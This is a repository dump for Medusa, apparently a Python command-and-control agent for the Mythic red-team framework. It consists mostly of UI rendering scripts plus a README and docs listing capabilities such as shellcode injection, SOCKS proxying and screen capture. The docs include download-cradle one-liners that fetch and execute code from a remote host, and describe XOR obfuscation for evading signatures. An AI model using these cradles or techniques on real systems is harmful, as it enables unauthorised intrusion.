{"plaintext": entries[i][1], "copyIcon": true}, "rowStyle": {"backgroundColor": "mediumpurple"} }) } return { "table": [ { "headers": [ {"plaintext": "command", "type": "string", "fillWidth": true}, {"plaintext": "task_id", "type": "string", "fillWidth": true}, ], "rows": output_table, "title": "Running Jobs" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/list_apps.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["apps"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "PID":{"plaintext": entries[i]["pid"]}, "Name":{"plaintext": entries[i]["name"]}, "Executable URL":{"plaintext": entries[i]["exec_url"], "copyIcon": true}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "PID", "type": "string"}, {"plaintext": "Name", "type": "string","width": 180}, {"plaintext": "Executable URL", "type": "string"}, ], "rows": output_table, "title": "Apps" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/list_dlls.js ================================================ 
function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["dlls"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "DLL":{"plaintext": entries[i], "copyIcon": true}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "DLL", "type": "string"}, ], "rows": output_table, "title": "Loaded DLLs" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/ls.js ================================================ function(task, response){ if(task.status.includes("error")){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed && response.length > 0){ // tables styles let folder = { backgroundColor: "mediumpurple", color: "white" }; let file = {}; var archiveFormats = 
[".a",".ar",".cpio",".shar",".LBR",".lbr",".mar",".sbx",".tar",".bz2",".F",".gz",".lz",".lz4",".lzma",".lzo",".rz",".sfark",".sz",".?Q?",".?Z?",".xz",".z",".Z",".zst",".??",".7z",".s7z",".ace",".afa",".alz",".apk",".arc",".arc",".arj",".b1",".b6z",".ba",".bh",".cab",".car",".cfs",".cpt",".dar",".dd",".dgc",".ear",".gca",".ha",".hki",".ice",".jar",".kgb",".lzh",".lzx",".pak",".pak",".parti",".paq6",".pea",".pim",".pit",".qda",".rar",".rk",".sda",".sea",".sen",".sfx",".shk",".sit",".sitx",".sqx",".tar",".tbz2",".uc",".uca",".uha",".war",".wim",".xar",".xp3",".yz1",".zip",".zoo",".zpaq",".zz",".ecc",".ecsbx",".par",".par2",".rev"]; var diskImages = [".dmg", ".iso", ".vmdk"]; var wordDocs = [".doc", ".docx", ".dotm", ".dot", ".wbk", ".docm", ".dotx", ".docb"]; var excelDocs = [".xls", ".xlsx", ".xlsm", ".xltx", ".xltm", ".xlmx", ".xlmt"]; var powerPoint = [".ppt", ".pptx", ".potx", ".ppsx", ".thmx", ".pot", ".pps"]; var pdfExt = [".pdf"]; var dbExt = [".db", ".sql", ".psql"]; var keyFiles = [".pem", ".ppk"]; var scriptFiles = [".config", ".ps1", ".psm1", ".psd1", ".vbs", ".js", ".py", ".pl", ".rb", ".go", ".xml", ".html", ".css", ".sh", ".bash", ".yaml", ".yml"]; // var uniqueName = task.id + "_additional_permission_info_modal"; let rows = []; let data = ""; try{ data = JSON.parse(response[0]); }catch(error){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } let headers = [ {"plaintext": "name", "type": "string", "fillWidth": true}, {"plaintext": "size", "type": "size", "width": 185}, {"plaintext": "last_accessed", "type": "string", "width": 285}, {"plaintext": "last_modified", "type": "string", "width": 285}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ]; for(let i = 0; i < data["files"].length; i++){ let ls_path = ""; let sep = data["parent_path"].includes("/") ? 
"/": "\\"; if(data["parent_path"] === "/"){ ls_path = data["parent_path"] + data["name"] + sep + data["files"][i]["name"]; }else{ ls_path = data["parent_path"] + sep + data["name"] + sep + data["files"][i]["name"]; } var icon = ""; if (data["files"][i]["is_file"] === true) { var fileExt = "." + data["files"][i]['name'].split(".").slice(-1)[0].toLowerCase(); if (archiveFormats.includes(fileExt)) { icon = 'archive/zip'; } else if (diskImages.includes(fileExt)) { icon = 'diskimage'; } else if (wordDocs.includes(fileExt)) { icon = 'word'; } else if (excelDocs.includes(fileExt)){ icon = 'excel'; } else if (powerPoint.includes(fileExt)) { icon = 'powerpoint'; } else if (pdfExt.includes(fileExt)){ icon = 'pdf/adobe'; } else if (dbExt.includes(fileExt)) { icon = 'database'; } else if (keyFiles.includes(fileExt)) { icon = 'key'; } else if (scriptFiles.includes(fileExt)) { icon = 'code/source'; } else { icon = 'code/source'; } } else { icon = 'closedFolder'; } let row = { "rowStyle": data["files"][i]["is_file"] ? 
file: folder, "name": { "plaintext": data["files"][i]["name"], "startIcon": icon }, "size": {"plaintext": String(data["files"][i]["size"])}, "last_accessed": {"plaintext": String(new Date(data["files"][i]["access_time"]))}, "last_modified": {"plaintext": String(new Date(data["files"][i]["modify_time"]))}, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "View XATTRs", "type": "dictionary", "value": data["files"][i]["permissions"], "leftColumnTitle": "XATTR", "rightColumnTitle": "Values", "title": "Viewing XATTRs" }, { "name": "LS Path", "type": "task", "ui_feature": "file_browser:list", "parameters": ls_path }, { "name": "Download File", "type": "task", "disabled": !data["files"][i]["is_file"], "ui_feature": "file_browser:download", "parameters": ls_path } ] }} }; rows.push(row); } return {"table":[{ "headers": headers, "rows": rows, "title": "File Listing Data" }]}; } else if(task.status === "processed"){ // this means we're still downloading return {"plaintext": "Only have partial data so far..."} }else{ // this means we shouldn't have any output return {"plaintext": "Not response yet from agent..."} } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/ps.js ================================================ function(task, response){ if(task.status.includes("error")){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(response.length > 0){ try{ let data = JSON.parse(response[0]); let entries = data["processes"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "UID":{"plaintext": (!"user_id" in entries[i]) ? ' ' : entries[i]['user_id'] }, "PID":{"plaintext": String(entries[i]["process_id"]) }, "PPID":{"plaintext": ((!"parent_process_id" in entries[i]) ? ' ' : entries[i]['parent_process_id']) }, "Name":{"plaintext": ((!"name" in entries[i]) ? 
' ' : entries[i]['name']) }, "Arch":{"plaintext": ((!"architecture" in entries[i]) ? ' ' : entries[i]['architecture']) }, "Bin Path":{"plaintext": ((!"bin_path" in entries[i]) ? ' ' : entries[i]['bin_path']) }, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "List DLLs", "type": "task", "ui_feature": "process_dlls:list", "parameters": { "process_id": entries[i]["process_id"] } }, ] }}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "UID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "PID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "PPID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "Name", "type": "string", "fillWidth": true}, {"plaintext": "Arch", "type": "string", "width": 70}, {"plaintext": "Bin Path", "type": "string", "fillWidth": true}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ], "rows": output_table, "title": "Running processes" } ] } }catch(error){ console.log(error); const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/ps_full.js ================================================ function(task, response){ if(task.status.includes("error")){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(response.length > 0){ try{ let data = JSON.parse(response[0]); let entries = data["processes"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "PID":{"plaintext": String(entries[i]["process_id"]), "copyIcon": true}, "PPID":{"plaintext": ((!entries[i].hasOwnProperty("parent_process_id")) ? 
' ' : String(entries[i]['parent_process_id'])) }, "Name":{"plaintext": ((!"name" in entries[i]) ? ' ' : entries[i]['name']) }, "Arch":{"plaintext": ((!"architecture" in entries[i]) ? ' ' : entries[i]['architecture']) }, "Integrity Level":{"plaintext": ((!entries[i].hasOwnProperty("integrity_level")) ? ' ' : String(entries[i]['integrity_level'])) }, "Command Line":{"plaintext": ((!"command_line" in entries[i]) ? ' ' : entries[i]['command_line']) }, "Bin Path":{"plaintext": ((!"bin_path" in entries[i]) ? ' ' : entries[i]['bin_path']), "copyIcon": true}, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "List DLLs", "type": "task", "ui_feature": "process_dlls:list", "parameters": { "process_id": String(entries[i]["process_id"]) } }, { "name": "View Details", "type": "dictionary", "value": entries[i], "leftColumnTitle": "Field", "rightColumnTitle": "Value", "title": "Viewing All Data" }, ] }}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "PID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "PPID", "type": "string", "width": 90,"disableSort": true}, {"plaintext": "Name", "type": "string", "fillWidth": true}, {"plaintext": "Arch", "type": "string", "width": 70}, {"plaintext": "Integrity Level", "type": "string", "width": 70}, {"plaintext": "Command Line", "type": "string", "fillWidth": true}, {"plaintext": "Bin Path", "type": "string", "fillWidth": true}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ], "rows": output_table, "title": "Running processes" } ] } }catch(error){ console.log(error); const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/screenshot.js 
================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length > 0){ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); return {"screenshot":[{ "agent_file_id": data["file_id"], "variant": "contained", "name": "View Screenshot" }]}; }else{ return {"plaintext": "No data to display..."} } }else if(task.status === "processed"){ // this means we're still downloading if(responses.length > 0){ let data = JSON.parse(responses[0]); return {"screenshot":[{ "agent_file_id": data["file_id"], "variant": "contained", "name": "View Partial Screenshot" }]}; } return {"plaintext": "No data yet..."} }else{ // this means we shouldn't have any output return {"plaintext": "Not response yet from agent..."} } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/tcc.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ var auth_values = [ "Access Denied", "Unknown", "Allowed", "Limited" ]; var auth_reason = [ "Error", "User Consent", "User Set", "System Set", "Service Policy", "MDM Policy", "Override Policy", "Missing usage string", "Prompt Timeout", "Preflight Unknown", "Entitled", "App Type Policy", ]; var client_type = [ "Bundle Identifier", "Absolute Path" ]; try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["tcc"]; let output_table = []; for(let i = 0; i < entries.length; i++){ let clienttype = client_type[entries[i]['client_type']]; let authval = auth_values[entries[i]['auth_value']]; let authres = auth_reason[entries[i]['auth_reason']]; 
output_table.push({ "Client":{"plaintext": entries[i]["client"]}, "Service":{"plaintext": entries[i]["service"]}, "Client Type": { "plaintext": clienttype }, "Auth Value": { "plaintext": authval }, "Auth Reason": { "plaintext": authres }, "Last Modified": { "plaintext": new Date(entries[i]['last_modified'] * 1000).toString() }, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "View All Data", "type": "dictionary", "value": entries[i], "leftColumnTitle": "Field", "rightColumnTitle": "Value", "title": "Viewing All Data" }, ] }}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "Client", "type": "string", "fillWidth": true}, {"plaintext": "Service", "type": "string", "fillWidth": true}, {"plaintext": "Client Type", "type": "string", "width": 160}, {"plaintext": "Auth Value", "type": "string", "width": 130}, {"plaintext": "Auth Reason", "type": "string", "width": 135}, {"plaintext": "Last Modified", "type": "string", "width": 285}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ], "rows": output_table, "title": "TCC" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_edits.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let folder = { backgroundColor: "mediumpurple", color: "white" }; let file = {}; let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["edits"]; let output_table = []; for(let i = 
0; i < entries.length; i++){ output_table.push({ "Backup File":{ "plaintext": entries[i]["backup"], "copyIcon": true }, "Original File":{ "plaintext": entries[i]["original"] }, "Size":{ "plaintext": entries[i]["size"] }, "Modified Time":{ "plaintext": entries[i]["mtime"] }, "Created Time":{ "plaintext": entries[i]["ctime"] }, "Type":{ "plaintext": entries[i]["type"] }, "rowStyle": {}, }) } return { "table": [ { "headers": [ {"plaintext": "Backup File", "type": "string", "fillWidth": true}, {"plaintext": "Original File", "type": "string", "fillWidth": true}, {"plaintext": "Size", "type": "string", "width": 80}, {"plaintext": "Modified Time", "type": "string", "width": 200}, {"plaintext": "Created Time", "type": "string", "width": 200}, {"plaintext": "Type", "type": "string", "width": 80}, ], "rows": output_table, "title": "Unsaved VSCode Edits" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_recent.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let folder = { backgroundColor: "mediumpurple", color: "white" }; let file = {}; let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["recents"]; let output_table = []; for(let i = 0; i < entries.length; i++){ var icon = ""; var rs = {}; if (entries[i]["type"] == "folder") { icon = 'closedFolder'; rs = folder; } else { icon = 'code/source'; rs = file; } output_table.push({ "Name":{ "plaintext": entries[i]["path"], "startIcon": 
icon }, "rowStyle": rs, }) } return { "table": [ { "headers": [ {"plaintext": "Name", "type": "string", "fillWidth": true}, ], "rows": output_table, "title": "Recent VSCode Files" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/rabbitmq_config.json ================================================ { "username": "mythic_user", "password": "mythic_password", "virtual_host": "mythic_vhost", "host": "127.0.0.1", "name": "hostname", "rabbitmq_password": "rabbitmq_password", "rabbitmq_host": "127.0.0.1", "mythic_server_host": "127.0.0.1", "container_files_path": "/Mythic/" } ================================================ FILE: README.md ================================================

Medusa Logo

# Medusa Medusa is a cross-platform agent compatible with both Python 3.8 and Python 2.7. ## Installation To install Medusa, you'll need Mythic v3 installed on a remote computer. You can find installation instructions for Mythic at the [Mythic project page](https://github.com/its-a-feature/Mythic/). From the Mythic install root, run the command: `./mythic-cli install github https://github.com/MythicAgents/Medusa.git` Once installed, restart Mythic to build a new agent. ## RabbitMQ Config Notes The file [Payload_Type/medusa/rabbitmq_config.json](Payload_Type/medusa/rabbitmq_config.json) is a template and must match your Mythic environment. - Set `rabbitmq_password` to your Mythic `RABBITMQ_PASSWORD` value (typically from Mythic `.env`). - Set `rabbitmq_host` to your RabbitMQ host/container name (often `mythic_rabbitmq` in docker-compose setups, or `127.0.0.1` for local binds). - Set `mythic_server_host` to your Mythic server host/container name (often `mythic_server` in docker-compose setups, or `127.0.0.1` for local binds). ## Notable Features - Dynamic loading/unloading of agent functions to limit exposure of agent capabilities on-disk. - Loading of Python modules in-memory for use in custom scripts. - Cross-platform SOCKS5 proxy - macOS clipboard reader, screenshot grabber and TCC database parsing - File browser compatibility with upload/download - Eval() of dynamic Python code - Basic Authentication Proxy compatibility ## Commands Manual Quick Reference The base agent and included commands all use built-in Python libraries, so do not need additional packages to function. Agents will run the commands in threads, so long-running uploads or downloads won't block the main agent. ### General Commands Command | Syntax | Description ------- | ------ | ----------- cat | `cat path/to/file` | Read and output file content. cd | `cd [.. dir]` | Change working directory (`..` to go up one directory). 
cp | `cp src_file_or_dir dst_file_or_dir` | Copy file or folder to destination. cwd | `cwd` | Print working directory. download | `download [path]` | Download a file from the target system. download_bulk | `download_bulk [path1] [path2] ...` | Download multiple files from the target system in one task. exit | `exit` | Exit a callback. env | `env` | Print environment variables. eval_code | `eval_code [commands]` | Execute python code and return output. jobkill | `jobkill [task id]` | Send stop signal to long running task. jobs | `jobs` | List long-running tasks, such as downloads. list_modules | `list_modules [module_name]` | Lists in-memory modules or the full file listing for a specific module. load | `load command` | Load a new capability into an agent. load_module | `load_module` | Load a zipped Python module into memory (adapted from [here](https://github.com/sulinx/remote_importer) and [here](https://github.com/EmpireProject/EmPyre/blob/master/data/agent/agent.py#L464)). load_script | `load_script` | Load and execute a Python script through the agent. ls | `ls [. path]` | List files and folders in `[path]` or use `.` for current working directory. mv | `mv src_file_or_dir dst_file_or_dir` | Move file or folder to destination. pip_freeze | `pip_freeze` | Programmatically list installed packages on system. rm | `rm file_or_dir` | Delete file or folder. shell | `shell [command]` | Run a shell command which will spawn using subprocess.Popen(). Note that this will wait for command to complete so be careful not to block your agent. socks | `socks start/stop [port]` | Start/stop SOCKS5 proxy through Medusa agent. sleep | `sleep [seconds] [jitter percentage]` | Set the callback interval of the agent in seconds. unload | `unload command` | Unload an existing capability from an agent. unload_module | `unload_module module_name` | Unload a Python module previously loaded into memory. upload | `upload` | Upload a file to a remote path on the machine. 
watch_dir | `watch_dir path seconds` | Watch for changes in target directory, polling for changes at a specified rate. ### macOS Commands Command | Syntax | Description ------- | ------ | ----------- clipboard | `clipboard` | Output contents of clipboard (uses Objective-C API, as outlined by Cedric Owens [here](https://github.com/cedowens/MacC2/blob/main/client.py#L90). macOS only, Python 2.7 only). list_apps | `list_apps` | List macOS applications (Python 2.7 only, macOS only). list_tcc | `list_tcc [path]` | List entries in macOS TCC database (requires full-disk access and Big Sur only atm). screenshot | `screenshot` | Take a screenshot (uses Objective-C API, macOS only, Python 2.7 only). spawn_jxa | `spawn_jxa` | Spawn an `osascript` process and pipe Javascript content to it. vscode_list_recent | `vscode_list_recent [state_db]` | Lists files and folders recently opened with VSCode. vscode_open_edits | `vscode_open_edits [backup_dir_path]` | Lists unsaved changes made to files in VSCode. vscode_watch_edits | `vscode_watch_edits [path to remote dir] [poll_interval]` | Poll the VSCode backups directory at a given interval for unsaved edits. ### Windows Commands Command | Syntax | Description ------- | ------ | ----------- shinject | `shinject` | Inject shellcode into target PID using CreateRemoteThread (Windows only - adapted from [here](https://gist.github.com/RobinDavid/9214020)). load_dll | `load_dll dll_path dll_export` | Load an on-disk DLL and execute an exported function (NOTE: This DLL must return an int value on completion, an msfvenom-created DLL, for example, will kill your agent upon completion). list_dlls | `list_dlls [pid]` | Read process memory (PEB) of local or target process to fetch list of loaded DLLs (Python 3 only) ps | `ps` | Get limited process information, e.g. 
PID, process names, architecture and binary paths (Python 3 only) ps_full | `ps_full` | Get full process information, including PPID, integrity level and command line (Python 3 only) kill | `kill` | Terminate a process by process ID (Python 3 only) ## Python Versions Both versions of the Medusa agent use an AES256 HMAC implementation written with built-in libraries (adapted from [here](https://github.com/boppreh/aes)), removing the need for any additional dependencies beyond a standard Python install. As such the agent should operate across Windows, Linux and macOS hosts. It's worth mentioning that this crypto implementation does introduce some overhead when handling large files (screenshotting, downloads, etc.) but it's workable. ### Py2 vs Py3 Commands Within the `Payload_Type/Medusa/agent_code` directory, you will see `base_agent` files with both `py2` and `py3` suffixes. Likewise, similar file extensions can be seen for individual function files too. These are read by the `builder.py` script to firstly select the right base Python version of the Medusa agent. `builder.py` will then include commands that are specific to the chosen python version. In the case where a command only has a `.py` extension, this will be used by default, with the assumption being that no alternative code is needed between the Py2 and Py3 versions. ## Threaded Jobs Medusa uses basic threading for job execution. Where jobs are potentially long-running, they can be implemented with a 'stop check' to respond to a signal from the `jobkill` task. This can be implemented with a code snippet similar to that shown below: ``` if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: # Some job-specific tidy up return "Job stopped." ``` This handler can be seen implemented within the `download`, `upload`, `watch_dir` and `screenshot` commands. 
Additionally, if the long-running job is expected to provide continuous output, the `sendTaskOutputUpdate` function - included in the base agent - can be used to update Mythic prior to the task completion. A dummy function that provides continuous output and can be `jobkill`'d can be seen below. ``` def dummyFunction(self, task_id): while(True): # Check if we've got a stop signal. if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." # Send output back to Mythic self.sendTaskOutputUpdate(task_id, "We're still running") time.sleep(10) ``` ## Supported C2 Profiles Medusa currently supports two C2 profiles: `http` (both with and without AES256 HMAC encryption) and `azure_blob`. ### HTTP Profile The HTTP profile calls back to the Mythic server over the basic, non-dynamic profile. GET requests for taskings, POST requests with responses. ## Thanks - Browser scripts and agent code adapted from [@its_a_feature_](https://twitter.com/its_a_feature_) and [@djhohnstein](https://twitter.com/djhohnstein). - [MacC2](https://github.com/cedowens/MacC2/) and [this](https://medium.com/red-teaming-with-a-blue-team-mentality/making-objective-c-calls-from-python-standard-libraries-550ed3a30a30) blog post from Cedric Owens - [EmPyre](https://github.com/EmpireProject/EmPyre/) and [this](https://www.xorrior.com/In-Memory-Python-Imports/) blog post from Chris Ross. - The crypto wizardry found [here](https://github.com/boppreh/aes). 
- Agent icon from [flaticon.com](https://www.flaticon.com) ================================================ FILE: config.json ================================================ { "exclude_payload_type": false, "exclude_c2_profiles": false, "exclude_documentation_payload": false, "exclude_documentation_c2": true, "exclude_agent_icons": false } ================================================ FILE: documentation-c2/.keep ================================================ ================================================ FILE: documentation-payload/.keep ================================================ ================================================ FILE: documentation-payload/medusa/_index.md ================================================ +++ title = "Medusa" chapter = false weight = 5 +++ ![logo](/agents/medusa/medusa.svg?width=200px) ## Summary Medusa is a cross-platform Python agent compatible with Python 2.7 and 3.8. ### Highlighted Agent Features Python is an incredibly popular programming language and is often installed by default on many operating systems. Python 2.7, for example, is currently available on the latest macOS installs (though expected to be discontinued). Default libraries, such as `Cocoa` and `ctypes`, allow access to Objective-C APIs and functionality through Windows DLLs. The Medusa agent itself has several key features including: - Support for dynamic loading/unloading of functionality to limit exposure of agent capabilities on-disk. - A SOCKS5 proxy compatible across Python 2.7 and 3.8, and across macOS, Windows and Linux. - Encrypted comms. - `Eval()` of Python code to dynamically extend functionality. 
With the ability to execute arbitrary script on the command-line, a rudimentary download cradle can be used, such as the below (notably, not proxy-aware):

```
python3 -c "import urllib.request; exec(urllib.request.urlopen('https://[REMOTE_HOST]/medusa.py').read())" &
```

Or for Python 2.7:

```
python -c "import urllib2;exec(urllib2.urlopen('https://[REMOTE_HOST]/medusa.py').read())" &
```

### Build Options

This section provides details of what each Medusa-specific build option provides.

#### Python Version

Pretty self-explanatory, select which version of Python the Medusa agent should be created for. See the Development section for details of how this works under the hood.

#### Output Format

Mythic can provide the final agent code as a Python script, or as a Base64-encoded blob. Note that this is effectively the last stage of the process, so any XOR obfuscation, crypto library selection or Python version selection will take place before this.

#### Cryptography library

Medusa agents can be built using either a manual crypto implementation or using the non-default `cryptography` library. Given that the manual implementation isn't going to be as quick or efficient as the main Python library (not to mention the extra code required), `cryptography` use might be the way to go. Though do bear in mind, it is not a default library and appears to only be installed on macOS by default.

{{% notice info %}}
Either option here won't affect the agent's ability to use encrypted comms; it is purely to specify how the encrypted comms are achieved.
{{% /notice %}}

#### XOR and Base64-encode

Finally, the plaintext Medusa script can be encrypted via XOR with a randomly-generated key, before being Base64 encoded. This blob is then wrapped with an unpacker and put in an `exec()` function to ultimately run the Medusa agent. This is designed to make the agent less signaturable when on-disk. See the OPSEC section for more details.
#### Verify HTTPS Certificate By default, the web request libraries used in Medusa will fail when handling a self-signed certificate for HTTPS. This function introduces code to skip cert verification, so C2 can be established. ### Important Notes Each job is executed in a new thread. Long-running jobs can be viewed with the `jobs` command and, where a 'stop' functionality has been implemented, they can be killed with `jobkill`. ## Authors @ajpc500 ================================================ FILE: documentation-payload/medusa/c2_profiles/Azure_Blob.md ================================================ +++ title = "Azure Blob" chapter = false weight = 103 +++ ## Summary The `medusa` agent supports Azure Blob Storage as a transport profile. Tasking and responses are exchanged through blobs in the provisioned container: - Agent uploads request blobs to `ats/.blob` - Agent polls and downloads response blobs from `sta/.blob` - Agent deletes processed response blobs after retrieval At build time, Medusa calls the `azure_blob` service to provision scoped configuration and stamps the generated values into the payload. ### Profile Option Deviations #### Callback Interval / Jitter The Azure Blob transport uses callback interval and jitter to control polling cadence for `sta/` response blobs. #### HTTPS Verification If Medusa build parameter `https_check` is set to `No`, TLS certificate verification is disabled for blob operations. ### Build-Time Notes When `azure_blob` is selected, Medusa: 1. Requests configuration from the `azure_blob` service (`generate_config` RPC) 2. Embeds: - blob endpoint - container name - scoped SAS token 3. 
Uses the core+transport template assembly process to generate the final payload ================================================ FILE: documentation-payload/medusa/c2_profiles/HTTP.md ================================================ +++ title = "HTTP" chapter = false weight = 102 +++ ## Summary The `medusa` agent uses a series of `POST` web requests to send responses for tasking and a series of `GET` requests to get tasking from the Mythic server. ### Profile Option Deviations #### Callback Host The URL for the redirector or Mythic server. This must include the protocol to use (e.g. `http://` or `https://`). ================================================ FILE: documentation-payload/medusa/c2_profiles/_index.md ================================================ +++ title = "C2 Profiles" chapter = true weight = 25 pre = "4. " +++ # Supported C2 Profiles This section goes into any `medusa` specifics for the supported C2 profiles. Current supported profiles: - HTTP - Azure Blob ================================================ FILE: documentation-payload/medusa/commands/_index.md ================================================ +++ title = "Commands" chapter = true weight = 15 pre = "2. " +++ # medusa command reference These pages provide in-depth documentation and code samples for the `medusa` commands. ================================================ FILE: documentation-payload/medusa/commands/cat.md ================================================ +++ title = "cat" chapter = false weight = 100 hidden = false +++ ## Summary Outputs the string content of a given file. No need for quotes and relative paths are fine. 
- Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path_to_read - Description: path to file we're going to read from - Required Value: True - Default Value: None ## Usage ``` cat /path/to/file ``` ## MITRE ATT&CK Mapping - T1005 ## Detailed Summary Prints the contents of a file on the target system: ```Python def cat(self, task_id, path): file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) with open(file_path, 'r') as f: content = f.readlines() return ''.join(content) ``` ================================================ FILE: documentation-payload/medusa/commands/cd.md ================================================ +++ title = "cd" chapter = false weight = 100 hidden = false +++ ## Summary Change the current working directory to another directory. No quotes are necessary and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path - Description: path to change directory to - Required Value: True - Default Value: None ## Usage ### Without Popup Option ``` cd ../path/here ``` ## MITRE ATT&CK Mapping - T1083 ## Detailed Summary You can either type `cd` and get a popup to fill in the path, or provide the path on the command line. ```Python def cd(self, task_id, path): if path == "..": self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep)) else: self.current_directory = path if path[0] == os.sep \ else os.path.abspath(os.path.join(self.current_directory,path)) ``` ================================================ FILE: documentation-payload/medusa/commands/clipboard.md ================================================ +++ title = "clipboard" chapter = false weight = 100 hidden = false +++ ## Summary Get all the types of contents on the clipboard, return specific types, or set the contents of the clipboard. 
